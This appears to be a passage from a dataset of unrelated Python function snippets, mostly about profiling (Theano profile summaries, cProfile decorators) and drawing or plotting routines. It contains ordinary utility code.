n_apply_to_print=config.profiling.n_apply)\r\n if not isinstance(ps, ScanProfileStats):\r\n to_sum.append(ps)\r\n else:\r\n #TODO print the name if there is one!\r\n print 'Skipping empty Profile'\r\n if len(to_sum) > 1:\r\n # Make a global profile\r\n cum = copy.copy(to_sum[0])\r\n cum.message = \"Sum of all printed profiles at exit excluding Scan op profile.\"\r\n for ps in to_sum[1:]:\r\n for attr in [\"compile_time\", \"fct_call_time\", \"fct_callcount\",\r\n \"vm_call_time\", \"optimizer_time\", \"linker_time\",\r\n \"validate_time\"]:\r\n setattr(cum, attr, getattr(cum, attr) + getattr(ps, attr))\r\n\r\n #merge dictonary\r\n for attr in [\"apply_time\", \"apply_callcount\",\r\n \"apply_cimpl\", \"variable_shape\", \"variable_strides\"]:\r\n cum_attr = getattr(cum, attr)\r\n for key, val in getattr(ps, attr).iteritems():\r\n assert key not in cum_attr\r\n cum_attr[key] = val\r\n\r\n if cum.optimizer_profile and ps.optimizer_profile:\r\n merge = cum.optimizer_profile[0].merge_profile(\r\n cum.optimizer_profile[1],\r\n ps.optimizer_profile[1])\r\n cum.optimizer_profile = (cum.optimizer_profile[0], merge)\r\n else:\r\n cum.optimizer_profile = None\r\n\r\n cum.summary(file=_atexit_print_file,\r\n n_ops_to_print=config.profiling.n_ops,\r\n n_apply_to_print=config.profiling.n_apply)", "def profile(_func=None,\n profile_id=None,\n sort_by=u'cumulative'):\n\n profilers.register(profile_id)\n\n def arg_wrapper(func):\n\n \"\"\" This is the real decorator and profiles the decorated function. \"\"\"\n\n @functools.wraps(func)\n def wrapper(*args,\n **kwargs):\n\n \"\"\" Simple profiler for the function.\n\n :param args: Args for the function.\n :param kwargs: Kwargs for the function.\n :return: The result of the function.\n \"\"\"\n\n _profiler = profilers.start_if_active(profile_id)\n\n # Run the function\n result = func(*args,\n **kwargs)\n\n profilers.stop_if_active(func=func,\n profile_id=profile_id,\n profiler=_profiler,\n sort_by=sort_by)\n\n # Return the function result\n return result\n\n # Return the decorated function\n return wrapper\n\n # _func's type depends on the usage of the decorator. It's a function\n # if it's used as `@decorator` but ``None`` if used as `@decorator()`.\n return arg_wrapper if _func is None else arg_wrapper(_func)", "def profile_function(fun: Callable,\n args: tuple or list = (),\n kwargs: dict or None = None,\n backends=None,\n trace=True,\n subtract_trace_time=True,\n retime=True,\n warmup=1,\n call_count=1) -> Profile:\n kwargs = kwargs if isinstance(kwargs, dict) else {}\n for _ in range(warmup):\n fun(*args, **kwargs)\n with profile(backends=backends, trace=trace, subtract_trace_time=subtract_trace_time) as prof:\n fun(*args, **kwargs)\n if retime:\n with prof.retime():\n fun(*args, **kwargs)\n if call_count > 1:\n with prof._accumulate_average(call_count):\n for _ in range(call_count - 1):\n fun(*args, **kwargs)\n return prof", "def annotate(args):\n prism.annotate.run(\n input_fp=args.input,\n output_fp=args.output,\n bed_fps=args.beds,\n annotation_names=args.annotation_names,\n output_figure_fp=args.figure,\n width=args.width,\n height=args.height,\n scale=args.scale,\n font_family=args.font_family,\n )", "def draw_page(page, stream):\n bleed = {\n side: page.style[f'bleed_{side}'].value\n for side in ('top', 'right', 'bottom', 'left')}\n marks = page.style['marks']\n stacking_context = StackingContext.from_page(page)\n draw_background(\n stream, stacking_context.box.background, clip_box=False, bleed=bleed,\n marks=marks)\n draw_background(stream, page.canvas_background, clip_box=False)\n draw_border(stream, page)\n draw_stacking_context(stream, stacking_context)", "def profile(func):\n\n def wrapper(*args, **kwargs):\n profile_filename = func.__name__ + \".prof\"\n profiler = cProfile.Profile()\n result = profiler.runcall(func, *args, **kwargs)\n profiler.dump_stats(profile_filename)\n return result\n\n return wrapper", "def profile(request):\n draws = []\n try:\n draws = MONGO.get_user_draws(request.user.pk)\n except Exception as e:\n LOG.error(\"There was an issue when retrieving user draws. {0}\".format(e))\n\n context = {'draws': draws}\n return render(request, 'profile.html', context)", "def setprofile(self, w_func):\n if self.space.is_w(w_func, self.space.w_None):\n self.profilefunc = None\n self.w_profilefuncarg = None\n else:\n self.setllprofile(app_profile_call, w_func)", "def draw_image(self, image, src_coor, src_size, dest_coor, dest_size, angle = 0):\n img = Image_process.update(image, src_coor, src_size, dest_size, angle)\n self.canvas.create_image(dest_coor, image=img)", "def DrawBase(screen, base_x, base_y, base_len, base_width):\n pygame.draw.rect(screen, (255,0,0),(base_x, base_y, base_len*2, base_width*2), 4)", "def TDProfiles(Prof,x,Trx,rb_spec,abs_spec,dr,inu0,bsrMult,base_T,base_P,r0):\n \n iR = Prof['WV Online'].size # range index for a profile into 1D x array\n x2 = np.reshape(x,(iR+1,6))\n xK = x2[0,:] # constants [HSRL Mol HSRL Comb, WV On, WV Off, O2 On ,O2 Off]\n xS = x2[1:,:] # state vector [T, nWV, BSR, phi_HSRL, phi_WV, phi_O2]\n \n # HSRLProfile(T,BSR,phi,rb_spec,Trx,inu0,K,base_T,base_P)\n HSRL_mol = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Mol'],inu0['HSRL'],xK[0],base_T,base_P)\n HSRL_comb = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Comb'],inu0['HSRL'],xK[1],base_T,base_P)\n \n# plt.figure()\n# plt.plot(np.exp(xS[:,0]))\n# plt.title('Temperature [K]')\n# \n# plt.figure()\n# plt.semilogy(np.exp(xS[:,1]))\n# plt.title('WV number density [$m^{-3}$]')\n# \n# plt.figure()\n# plt.semilogy(np.exp(xS[:,2])+1)\n# plt.title('Backscatter Ratio')\n \n \n# HSRLModel = HSRLProfileRatio(xS[:,0],P,xS[:,2], \\\n# Trx['HSRL Mol'],Trx['HSRL Comb'], \\\n# rb_spec['HSRL'],inu0['HSRL'],GainRatio=xK[0])\n\n# WVDIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n WV_on = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Online'],abs_spec['WV Online'],Trx['WV Online'],inu0['WV Online'],xK[2],base_T,base_P,dr,r0)\n WV_off = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Offline'],abs_spec['WV Offline'],Trx['WV Offline'],inu0['WV Offline'],xK[3],base_T,base_P,dr,r0)\n\n# WVModel = WaterVaporProfileRatio(xS[:,0],P,xS[:,1],xS[:,2]*bsrMult['WV'],\n# Trx['WV Online'], Trx['WV Offline'], \\\n# rb_spec['WV Online'],rb_spec['WV Offline'], \\\n# abs_spec['WV Online'],abs_spec['WV Offline'],dr, \\\n# inu0['WV Online'],inu0['WV Offline'],GainRatio=xK[1])\n\n\n# O2DIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n O2_on = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Online'],abs_spec['O2 Online'],Trx['O2 Online'],inu0['O2 Online'],xK[4],base_T,base_P,dr,r0)\n O2_off = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Offline'],abs_spec['O2 Offline'],Trx['O2 Offline'],inu0['O2 Offline'],xK[5],base_T,base_P,dr,r0)\n \n# O2Model = OxygenProfileRatio(xS[:,0],P,xS[:,1],xS[:,2]*bsrMult['O2'],\n# Trx['O2 Online'], Trx['O2 Offline'], \\\n# rb_spec['O2 Online'],rb_spec['O2 Offline'], \\\n# abs_spec['O2 Online'],abs_spec['O2 Offline'],dr, \\\n# inu0['O2 Online'],inu0['O2 Offline'],GainRatio=xK[2])\n \n return HSRL_mol, HSRL_comb, WV_on, WV_off, O2_on, O2_off", "def Run_Profile(init,traits,Env,sig = 0.0001,Ntot0 = 10,tmax = 100,T=TS,dt = 0.01,mu=0.005):\n\n\t## Environmental conditions\n\tHinf = Env[0]\n\tCinf = Env[1]\n\tNinf = Env[2]\n\tGinf = Env[3]\n\tQH = Env[4]\n\tQC = Env[5]\n\tQN = Env[6]\n\tQG = Env[7]\n \n\t## Traits \n\tthresh = traits[7]\n\tslope = traits[8]\n\tgmax = traits[9]\n\tVc = traits[1]\n\tQc = traits[2]\n\n\t## Calculation of constants over timescale of interest (here, the temperature is constant)\n\tDeltaG0catT = DeltaG0(T,deltaG0Cat,deltaH0Cat)\n\tDeltaG0anaT = DeltaG0(T,deltaG0Ana,deltaH0Ana)\n \n\t## Initialization\n\tHT = []\n\tCT = []\n\tNT = []\n\tGT = []\n\tXoT = []\n\tNCT = []\n\tXT = []\n\tD = []\n\ttime = []\n\tNPPT = []\n\tt=1\n\n\tHT.append(init[0])\n\tCT.append(init[1])\n\tNT.append(init[2])\n\tGT.append(init[3])\n\tXoT.append(init[4])\n\tNCT.append(init[5])\n\tXT.append(init[6])\n\tD.append(0)\n\ttime.append(0)\n\tt=1\n \n\twhile time[t-1] < tmax: \n\t\tH = HT[t-1]\n\t\tC = CT[t-1]\n\t\tN = NT[t-1]\n\t\tG = GT[t-1]\n\t\tXo = XoT[t-1]\n\t\tNC = NCT[t-1]\n\t\tX0 = XT[t-1]\n\n\t\tnNCT,nXT,qana,qcat,decay,mort,dt = Step_Profile(NC,X0,traits,[H,C,N,G],gamma,T,dt)\n\t\tNCT.append(nNCT)\n\t\tXT.append(nXT)\n\t\tD.append(decay+mort)\n\t\tnS = Step_Substrates([H,C,N,G],Hinf,Cinf,Ninf,Ginf,QH,QC,QN,QG,NCT[t-1],qana,qcat,dt,Vc)\n\t\tHT.append(nS[0])\n\t\tCT.append(nS[1])\n\t\tNT.append(nS[2])\n\t\tGT.append(nS[3])\n\t\tNPPT.append(qana*NC)\n\n\t\tnXo = Step_DeadBiomass(Xo,Hinf,Cinf,Ninf,Ginf,QH,QC,QN,QG,NCT[t-1],decay,mort,Qc,XT[t-1],dt,Vc)\n\t\tXoT.append(nXo)\n\t\ttime.append(time[t-1] + dt)\n\t\tt=t+1 \n#\t\tprint(time[t-1])\n\treturn(NCT,XT,HT,CT,NT,GT,XoT,D,time,NPPT)", "def plot_profiles(self, fig=0, title=''):\n plot_input.plot_profiles(self, fig, title)", "def setprofile(function): # real signature unknown; restored from __doc__\n pass", "def stamp(self):\n screen = self.screen\n shape = screen._shapes[self.Myturtle.shapeIndex]\n ttype = shape._type\n tshape = shape._data\n if ttype == \"polygon\":\n stitem = screen._createpoly()\n if self._resizemode == \"noresize\": w = 1\n elif self._resizemode == \"auto\": w = self._pensize\n else: w =self._outlinewidth\n shape = self._polytrafo(self._getshapepoly(tshape))\n fc, oc = self._fillcolor, self._pencolor\n screen._drawpoly(stitem, shape, fill=fc, outline=oc,\n width=w, top=True)\n elif ttype == \"image\":\n stitem = screen._createimage(\"\")\n screen._drawimage(stitem, self._position, tshape)\n elif ttype == \"compound\":\n stitem = []\n for element in tshape:\n item = screen._createpoly()\n stitem.append(item)\n stitem = tuple(stitem)\n for item, (poly, fc, oc) in zip(stitem, tshape):\n poly = self._polytrafo(self._getshapepoly(poly, True))\n screen._drawpoly(item, poly, fill=self._cc(fc),\n outline=self._cc(oc), width=self._outlinewidth, top=True)\n self.stampItems.append(stitem)\n self.undobuffer.push((\"stamp\", stitem))\n return stitem", "def draw_annotation(img, boxes, klass, polygons=None, is_crowd=None):\n labels = []\n assert len(boxes) == len(klass)\n if is_crowd is not None:\n assert len(boxes) == len(is_crowd)\n for cls, crd in zip(klass, is_crowd):\n clsname = cfg.DATA.CLASS_NAMES[cls]\n if crd == 1:\n clsname += ';Crowd'\n labels.append(clsname)\n else:\n for cls in klass:\n labels.append(cfg.DATA.CLASS_NAMES[cls])\n img = viz.draw_boxes(img, boxes, labels)\n\n if polygons is not None:\n for p in polygons:\n mask = polygons_to_mask(p, img.shape[0], img.shape[1])\n img = draw_mask(img, mask)\n return img", "def sweep(profile,n,capped=False):\n assert n > 2 and isinstance(n,int)\n profile = openPoly(profile)\n t = yRot(360/n)\n result = Mesh()\n\n if capped:\n first = profile[0]\n firstOnY = [0,first[1],0]\n if not near(first,firstOnY):\n print(\"adding bottom cap\")\n cap = []\n for i in range(n):\n cap.append(first)\n first = t(first)\n result.addPoly(cap)\n\n last = profile[-1]\n lastOnY = [0,last[1],0]\n if not near(last,lastOnY):\n print(\"adding top cap.\")\n cap = []\n for i in range(n):\n cap.append(last)\n last = t(last)\n result.addPoly(cap[::-1])\n\n for i in range(n):\n newProfile = t(profile)\n for ((p0,p1),(q0,q1)) in zip(edges(profile),edges(newProfile)):\n if near(p0,q0): # when p0 near y axis\n if not near(p1,q1):\n result.addTri([p0,p1,q1])\n elif near(p1,q1): # when p1 near y axis\n result.addTri([p0,p1,q0])\n else:\n result.addTri([p0,p1,q0])\n result.addTri([p1,q1,q0])\n profile = newProfile\n return result", "def draw_on_image(self, img):\n image = Image(img)\n\n # If the overlay has not expired, draw on the plate highlight and/or the status message\n if not self.has_expired():\n self._plate.draw_plate(image, Color.Blue())\n self._plate.draw_pins(image, self._options)", "def plot_ave_profile(f,y):\n favex = np.mean(f, axis=1) # Horizontal average\n\n # Plot\n fig, ax = plt.subplots(1,1, figsize=(15,9))\n ax.plot(favex, y)\n\n # Label\n ax.set_xlabel(r'$\\overline{T}$')\n ax.set_ylabel(r'$y$')\n fig.tight_layout()\n\n # Save\n fig.savefig('Tave.pdf')\n \n plt.show()", "def print_summary_(fct_name, compile_time, fct_call_time, fct_call,\r\n apply_time, apply_cimpl, message, variable_shape,\r\n local_time, other_time,\r\n n_apply_to_print=config.ProfileMode.n_apply_to_print,\r\n n_ops_to_print=config.ProfileMode.n_ops_to_print,\r\n print_apply=True,\r\n min_memory_size=config.ProfileMode.min_memory_size,\r\n ):\r\n\r\n print \"ProfileMode is deprecated! Use the new profiler.\"\r\n print \" The Theano flags to enable it ise: profile=True\"\r\n print \" The Theano flags for the memory profile to it is: profile_memory=True\"\r\n\r\n total_time = time.time() - import_time\r\n total_fct_time = sum(fct_call_time.values())\r\n total_fct_call = sum(fct_call.values())\r\n unknown_time = total_time - total_fct_time - compile_time\r\n overhead_time = total_fct_time - local_time\r\n if total_fct_time > 0:\r\n time_pr_in_fct = local_time / total_fct_time * 100\r\n overhead_time_pourcent_fct_time = (overhead_time / total_fct_time *\r\n 100)\r\n time_per_call = total_fct_time / total_fct_call\r\n else:\r\n time_pr_in_fct = 0\r\n overhead_time_pourcent_fct_time = 0\r\n time_per_call = 0\r\n\r\n print\r\n print 'ProfileMode.%s(%s)' % (fct_name,message)\r\n print '---------------------------'\r\n print\r\n print 'Time since import %.3fs'%(total_time)\r\n print 'Theano compile time: %.3fs (%.1f%% since import)'%(compile_time, compile_time/total_time*100)\r\n print ' Optimization time: %.3fs'%(other_time['optimizer_time'])\r\n print ' Linker time: %.3fs'%(other_time['linker_time'])\r\n print 'Theano fct call %.3fs (%.1f%% since import)'%(total_fct_time, total_fct_time/total_time*100)\r\n print ' Theano Op time %.3fs %.1f%%(since import) %.1f%%(of fct call)'% (\r\n local_time, local_time/total_time*100, time_pr_in_fct)\r\n print ' Theano function overhead in ProfileMode %.3fs %.1f%%(since import) %.1f%%(of fct call)'% (\r\n overhead_time, overhead_time/total_time*100, overhead_time_pourcent_fct_time)\r\n print '%i Theano fct call, %.3fs per call'%(total_fct_call, time_per_call)\r\n print 'Rest of the time since import %.3fs %.1f%%'%(unknown_time, unknown_time/total_time*100)\r\n\r\n print\r\n print 'Theano fct summary:'\r\n print '<% total fct time> <total time> <time per call> <nb call> <fct name>'\r\n for key in fct_call.keys():\r\n if fct_call[key]>0:\r\n print ' %4.1f%% %.3fs %.2es %d %s'%(fct_call_time[key]/total_fct_time*100 ,fct_call_time[key],\r\n fct_call_time[key]/fct_call[key], fct_call[key], key.name)\r\n else:\r\n print ' NOT CALLED',key.name\r\n\r\n\r\n # Compute stats per op.\r\n op_time = {}\r\n op_call = {}\r\n op_apply = {}\r\n op_cimpl = {}\r\n sop_apply = {}\r\n for (i,a),t in apply_time.items():\r\n op=a.op\r\n op_time.setdefault(op,0)\r\n op_call.setdefault(op,0)\r\n op_apply.setdefault(op,0)\r\n sop_apply.setdefault(type(a.op),0)\r\n op_time[op]+=t\r\n nb_call = [v for k,v in fct_call.items() if k.maker.fgraph is a.fgraph][0]\r\n op_cimpl.setdefault(a.op, True)\r\n op_cimpl[a.op] = op_cimpl[a.op] and apply_cimpl.get(a, False)\r\n if t==0:\r\n assert nb_call == 0, nb_call\r\n else:\r\n op_call[op] += nb_call\r\n op_apply[op] += 1\r\n sop_apply[type(a.op)] += 1\r\n\r\n # Compute stats per op class\r\n sop_time={}\r\n sop_call={}\r\n sop_op = {}\r\n sop_cimpl={} #map each op class to Bool. True iff all applies were done in c.\r\n for a,t in op_time.items():\r\n typ = type(a)\r\n sop_time.setdefault(typ,0)\r\n sop_time[typ]+=t\r\n sop_op.setdefault(typ,0)\r\n sop_op[typ]+=1\r\n sop_cimpl.setdefault(typ,True)\r\n sop_cimpl[typ]=sop_cimpl[typ] and op_cimpl.get(a, False)\r\n sop_call[typ]=sop_call.get(typ,0)+op_call[a]\r\n\r\n\r\n # Print the summary per op class.\r\n print\r\n print 'Single Op-wise summary:'\r\n print '<% of local_time spent on this kind of Op> <cumulative %> <self seconds> <cumulative seconds> <time per call> [*] <nb_call> <nb_op> <nb_apply> <Op name>'\r\n sotimes = [(t*100/local_time, t, a, sop_cimpl[a], sop_call[a], sop_op[a], sop_apply[a]) for a, t in sop_time.items()]\r\n sotimes.sort()\r\n sotimes.reverse()\r\n tot=0\r\n for f,t,a,ci, nb_call, nb_op, nb_apply in sotimes[:n_ops_to_print]:\r\n if nb_call == 0:\r\n assert t == 0\r\n continue\r\n tot+=t\r\n ftot=tot*100/local_time\r\n if ci:\r\n msg = '*'\r\n else:\r\n msg = ' '\r\n print ' %4.1f%% %5.1f%% %5.3fs %5.3fs %.2es %s %5d %2d %2d %s' % (f, ftot, t, tot, t/nb_call, msg, nb_call, nb_op, nb_apply, a)\r\n print ' ... (remaining %i single Op account for %.2f%%(%.2fs) of the runtime)'\\\r\n %(max(0, len(sotimes)-n_ops_to_print),\r\n sum(soinfo[0] for soinfo in sotimes[n_ops_to_print:]),\r\n sum(soinfo[1] for soinfo in sotimes[n_ops_to_print:]))\r\n\r\n print '(*) Op is running a c implementation'\r\n\r\n\r\n # The summary per op\r\n op_flops = {}\r\n for a,t in op_time.items():\r\n if hasattr(a,'flops'):\r\n op_flops[a]=a.flops*op_call[a]/t/1e6\r\n flops_msg=''\r\n if op_flops:\r\n flops_msg=' <MFlops/s>'\r\n print '\\nHACK WARNING: we print the flops for some OP, but the logic don\\'t always work. You need to know the internal of Theano to make it work correctly. Otherwise don\\'t use!'\r\n print\r\n print 'Op-wise summary:'\r\n print '<%% of local_time spent on this kind of Op> <cumulative %%> <self seconds> <cumulative seconds> <time per call> [*] %s <nb_call> <nb apply> <Op name>'%(flops_msg)\r\n\r\n otimes = [(t*100/local_time, t, a, op_cimpl.get(a, 0), op_call.get(a, 0), op_apply.get(a,0))\r\n for a, t in op_time.items()]\r\n otimes.sort()\r\n otimes.reverse()\r\n tot=0\r\n for f,t,a,ci,nb_call,nb_apply in otimes[:n_ops_to_print]:\r\n if nb_call == 0:\r\n assert t == 0\r\n continue\r\n tot+=t\r\n ftot=tot*100/local_time\r\n if ci:\r\n msg = '*'\r\n else:\r\n msg = ' '\r\n if op_flops:\r\n print ' %4.1f%% %5.1f%% %5.3fs %5.3fs %.2es %s %7.1f %5d %2d %s' % (f, ftot, t, tot, t/nb_call, msg, op_flops.get(a,-1), nb_call, nb_apply, a)\r\n else:\r\n print ' %4.1f%% %5.1f%% %5.3fs %5.3fs %.2es %s %5d %2d %s' % (f, ftot, t, tot, t/nb_call, msg, nb_call, nb_apply, a)\r\n print ' ... (remaining %i Op account for %6.2f%%(%.2fs) of the runtime)'\\\r\n %(max(0, len(otimes)-n_ops_to_print),\r\n sum(f for f, t, a, ci, nb_call, nb_op in otimes[n_ops_to_print:]),\r\n sum(t for f, t, a, ci, nb_call, nb_op in otimes[n_ops_to_print:]))\r\n print '(*) Op is running a c implementation'\r\n\r\n\r\n if print_apply:\r\n print\r\n print 'Apply-wise summary:'\r\n print '<% of local_time spent at this position> <cumulative %%> <apply time> <cumulative seconds> <time per call> [*] <nb_call> <Apply position> <Apply Op name>'\r\n atimes = [(t*100/local_time, t, a, [v for k,v in fct_call.items() if k.maker.fgraph is a[1].fgraph][0]) for a, t in apply_time.items()]\r\n atimes.sort()\r\n atimes.reverse()\r\n tot=0\r\n for f,t,a,nb_call in atimes[:n_apply_to_print]:\r\n tot+=t\r\n ftot=tot*100/local_time\r\n if nb_call==0:\r\n continue\r\n if apply_cimpl.get(a[1], False):\r\n msg = '*'\r\n else:\r\n msg = ' '\r\n print ' %4.1f%% %5.1f%% %5.3fs %5.3fs %.2es %s %i %2i %s' % (\r\n f, ftot, t, tot, t/nb_call, msg, nb_call, a[0], str(a[1]))\r\n print ' ... (remaining %i Apply instances account for %.2f%%(%.2fs) of the runtime)'\\\r\n %(max(0, len(atimes)-n_apply_to_print),\r\n sum(f for f, t, a, nb_call in atimes[n_apply_to_print:]),\r\n sum(t for f, t, a, nb_call in atimes[n_apply_to_print:]))\r\n print '(*) Op is running a c implementation'\r\n for printer in profiler_printers:\r\n printer(fct_name, compile_time, fct_call_time, fct_call,\r\n apply_time, apply_cimpl, message, variable_shape,\r\n other_time)\r\n\r\n if not variable_shape:\r\n print \"\"\"\\nProfile of Theano intermediate memory disabled.\r\n To enabled, put the Theano flag ProfileMode.profile_memory to True.\"\"\"\r\n else:\r\n print \"\"\"\r\n The memory profile in ProfileMode is removed!\r\n Use the new profiler. Use the Theano flags\r\n profile=True,profile_memory=True to enable it.\"\"\"\r\n\r\n print\r\n print \"\"\"Here are tips to potentially make your code run faster\r\n(if you think of new ones, suggest them on the mailing list).\r\nTest them first, as they are not guaranteed to always provide a speedup.\"\"\"\r\n from theano import tensor as T\r\n from theano.tensor.raw_random import RandomFunction\r\n import theano\r\n import theano.scalar as scal\r\n scalar_op_amdlibm_no_speed_up = [scal.LT, scal.GT, scal.LE, scal.GE,\r\n scal.EQ, scal.NEQ, scal.InRange,\r\n scal.Switch, scal.OR, scal.XOR,\r\n scal.AND, scal.Invert, scal.Maximum,\r\n scal.Minimum, scal.Add, scal.Mul,\r\n scal.Sub, scal.TrueDiv, scal.IntDiv,\r\n scal.Clip, scal.Second, scal.Identity,\r\n scal.Cast, scal.Sgn, scal.Neg,\r\n scal.Inv, scal.Sqr]\r\n scalar_op_amdlibm_speed_up = [scal.Mod, scal.Pow, scal.Ceil,\r\n scal.Floor, scal.RoundHalfToEven,\r\n scal.RoundHalfAwayFromZero, scal.Log,\r\n scal.Log2, scal.Log10, scal.Log1p,\r\n scal.Exp, scal.Sqrt, scal.Abs, scal.Cos,\r\n scal.Sin, scal.Tan, scal.Tanh,\r\n scal.Cosh, scal.Sinh,\r\n T.nnet.sigm.ScalarSigmoid,\r\n T.nnet.sigm.ScalarSoftplus]\r\n # Abs, Mod in float{32,64} only\r\n\r\n def get_scalar_ops(s):\r\n if isinstance(s, theano.scalar.Composite):\r\n l = []\r\n for node in s.fgraph.toposort():\r\n l += get_scalar_ops(node.op)\r\n return l\r\n else:\r\n return [s]\r\n\r\n def list_scalar_op(op):\r\n if isinstance(op.scalar_op, theano.scalar.Composite):\r\n return get_scalar_ops(op.scalar_op)\r\n else:\r\n return [op.scalar_op]\r\n\r\n def amdlibm_speed_up(op):\r\n if not isinstance(op, T.Elemwise):\r\n return False\r\n else:\r\n l = list_scalar_op(op)\r\n for s_op in l:\r\n if s_op.__class__ in scalar_op_amdlibm_speed_up:\r\n return True\r\n elif s_op.__class__ not in scalar_op_amdlibm_no_speed_up:\r\n print \"We don't know if amdlibm will accelerate this scalar op.\", s_op\r\n return False\r\n\r\n def exp_float32_op(op):\r\n if not isinstance(op, T.Elemwise):\r\n return False\r\n else:\r\n l = list_scalar_op(op)\r\n return any([s_op.__class__ in [scal.Exp] for s_op in l])\r\n\r\n printed_tip = False\r\n #tip 1\r\n if config.floatX == 'float64':\r\n print \" - Try the Theano flag floatX=float32\"\r\n printed_tip = True\r\n\r\n #tip 2\r\n if not config.lib.amdlibm and any([amdlibm_speed_up(a.op) for i, a\r\n in apply_time]):\r\n print \" - Try installing amdlibm and set the Theano flag lib.amdlibm=True. This speeds up only some Elemwise operation.\"\r\n printed_tip = True\r\n\r\n #tip 3\r\n if not config.lib.amdlibm and any([exp_float32_op(a.op) and\r\n a.inputs[0].dtype == 'float32'\r\n for i, a in apply_time]):\r\n print (\" - With the default gcc libm, exp in float32 is slower \"\r\n \"than in float64! Try Theano flag floatX=float64, or \"\r\n \"install amdlibm and set the theano flags lib.amdlibm=True\")\r\n printed_tip = True\r\n\r\n #tip 4\r\n for a, t in apply_time.iteritems():\r\n node = a[1]\r\n if (isinstance(node.op, T.Dot) and\r\n all([len(i.type.broadcastable) == 2 for i in node.inputs])):\r\n print (\" - You have a dot operation that was not optimized to\"\r\n \" dot22 (which is faster). Make sure the inputs are \"\r\n \"float32 or float64, and are the same for both inputs. \"\r\n \"Currently they are: %s\" %\r\n [i.type for i in node.inputs])\r\n printed_tip = True\r\n\r\n #tip 5\r\n for a, t in apply_time.iteritems():\r\n node = a[1]\r\n if isinstance(node.op, RandomFunction):\r\n printed_tip = True\r\n print (\" - Replace the default random number generator by \"\r\n \"'from theano.sandbox.rng_mrg import MRG_RandomStreams \"\r\n \"as RandomStreams', as this is is faster. It is still \"\r\n \"experimental, but seems to work correctly.\")\r\n if config.device.startswith(\"gpu\"):\r\n print (\" - MRG_RandomStreams is the only random number\"\r\n \" generator supported on the GPU.\")\r\n break\r\n\r\n if not printed_tip:\r\n print \" Sorry, no tip for today.\"", "def info(ctx, input, aspect, indent, namespace, meta_member, verbose, bidx,\n masked):\n verbosity = (ctx.obj and ctx.obj.get('verbosity')) or 1\n logger = logging.getLogger('rio')\n mode = 'r' if (verbose or meta_member == 'stats') else 'r-'\n\n try:\n with rasterio.drivers(CPL_DEBUG=(verbosity > 2)):\n with rasterio.open(input, mode) as src:\n info = src.profile\n info['transform'] = info['affine'][:6]\n del info['affine']\n info['shape'] = info['height'], info['width']\n info['bounds'] = src.bounds\n proj4 = rasterio.crs.to_string(src.crs)\n if proj4.startswith('+init=epsg'):\n proj4 = proj4.split('=')[1].upper()\n info['crs'] = proj4\n info['res'] = src.res\n info['lnglat'] = src.lnglat()\n if verbose:\n stats = [{'min': float(b.min()),\n 'max': float(b.max()),\n 'mean': float(b.mean())\n } for b in src.read(masked=masked)]\n info['stats'] = stats\n info['checksum'] = [src.checksum(i) for i in src.indexes]\n if aspect == 'meta':\n if meta_member == 'stats':\n band = src.read(bidx, masked=masked)\n click.echo('%f %f %f' % (\n float(band.min()),\n float(band.max()),\n float(band.mean())))\n elif meta_member == 'checksum':\n click.echo(str(src.checksum(bidx)))\n elif meta_member:\n if isinstance(info[meta_member], (list, tuple)):\n click.echo(\" \".join(map(str, info[meta_member])))\n else:\n click.echo(info[meta_member])\n else:\n click.echo(json.dumps(info, indent=indent))\n elif aspect == 'tags':\n click.echo(\n json.dumps(src.tags(ns=namespace), indent=indent))\n except Exception:\n logger.exception(\"Exception caught during processing\")\n raise click.Abort()", "def format(self, record):\n stack = inspect.stack(context=0)\n depth = len(stack)\n if self.baseline is None:\n self.baseline = depth\n if self.cut is None:\n filenames = map(lambda x: x.filename, stack)\n self.cut = self.identify_cut(filenames)\n\n # Inject custom information into the record\n record.indent = \".\" * (depth - self.baseline + self.manual_push)\n if depth > self.cut:\n record.function = stack[self.cut].function\n\n # Format the record using custom information\n self.update_format(record)\n out = super().format(record)\n\n # Remove custom information from the record\n del record.indent\n if hasattr(record, \"function\"):\n del record.function\n\n return out", "def ProfilePlot(t,y,z,scale=86400, axis=0,color=[0.5,0.5,0.5]):\r\n from matplotlib import collections\r\n from matplotlib.ticker import Formatter\r\n\r\n class MyFormatter(Formatter):\r\n def __init__(self, dates, fmt='%b %d %Y'):\r\n self.fmt = fmt\r\n self.dates = dates\r\n\r\n def __call__(self, x, pos=0):\r\n 'Return the label for time x s'\r\n return datetime.strftime(datetime(1990,1,1)+timedelta(seconds=x),self.fmt)\r\n\r\n tsec = othertime.SecondsSince(t)\r\n formatter = MyFormatter(tsec)\r\n \r\n y = np.swapaxes(y,0,axis)\r\n \r\n lines=[]\r\n line2 =[]\r\n for ii, tt in enumerate(tsec):\r\n #xplot = set_scale(y[:,ii],tt)\r\n xplot = tt + y[:,ii]*scale\r\n lines.append(np.array((xplot,z)).T)\r\n line2.append(np.array([[tt,tt],[z[0],z[-1]]]).T)\r\n \r\n \r\n LC1 = collections.LineCollection(lines,colors=color,linewidths=1.5)\r\n LC2 = collections.LineCollection(line2,colors='k',linestyles='dashed') # Zero axis\r\n \r\n ax=plt.gca()\r\n ax.add_collection(LC1)\r\n ax.add_collection(LC2)\r\n ax.set_ylim((z.min(),z.max()))\r\n ax.xaxis.set_major_formatter(formatter)\r\n ax.set_xlim((tsec[0],tsec[-1]))\r\n plt.xticks(rotation=17) \r\n \r\n return ax", "def combine_profiles(profiles):\n rd_abs = dict() # dict of absolute time refs\n rd_rel = dict() # dict of relative time refs\n pd_abs = dict() # profiles which have absolute time refs\n pd_rel = dict() # profiles which have relative time refs\n\n for prof in profiles:\n p = list()\n tref = None\n qed = 0\n with open(prof, 'r') as csvfile:\n reader = csv.DictReader(csvfile, fieldnames=_prof_fields)\n empty = True\n for row in reader:\n\n # skip header\n if row['time'].startswith('#'):\n continue\n\n empty = False\n row['time'] = float(row['time'])\n \n # find first tref\n if not tref:\n if 